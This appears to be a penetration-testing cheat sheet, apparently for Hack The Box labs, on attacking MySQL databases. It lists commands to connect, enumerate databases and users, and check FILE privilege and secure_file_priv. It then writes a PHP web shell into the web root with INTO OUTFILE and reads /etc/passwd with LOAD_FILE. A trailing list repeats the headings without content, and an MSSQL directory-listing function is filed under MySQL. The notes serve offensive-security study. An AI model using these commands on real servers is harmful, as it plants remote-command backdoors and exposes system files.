`dbeaver`#

sudo apt install dbeaver

It is a GUI app

Mysql#

Connect#

mysql -u "$user" "-p$pass" -h $target

Common commands#

-- Show all db
SHOW DATABASES;
-- Choose a db
USE htbusers;
-- Show tables in selected db
SHOW TABLES;
-- Show all data in a table
SELECT * FROM users;

Check db user#

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user

Write Local Files#

Check privilege#

To be able to write file, the current db user needs to have FILE privilege, and the secure_file_priv variable needs to be empty, or specific directory

Find `FILE` privilege#

SELECT grantee, privilege_type FROM information_schema.user_privileges

Find `secure_file_priv` variable#

If Null then we can’t. Otherwise, empty or specific directory means we can

show variables like "secure_file_priv";

Alternative way

SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

Write#

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

Read local file#

select LOAD_FILE("/etc/passwd");

List dir#

SELECT * FROM sys.dm_os_enumerate_filesystem ('C:\Users','*') WHERE parent_directory = 'C:\Users';

dbeaver#

Mysql#

Connect#

Common commands#

Check db user#

Write Local Files#

Check privilege#

Find FILE privilege#

Find secure_file_priv variable#

Write#

Read local file#

List dir#

`dbeaver`#

Find `FILE` privilege#

Find `secure_file_priv` variable#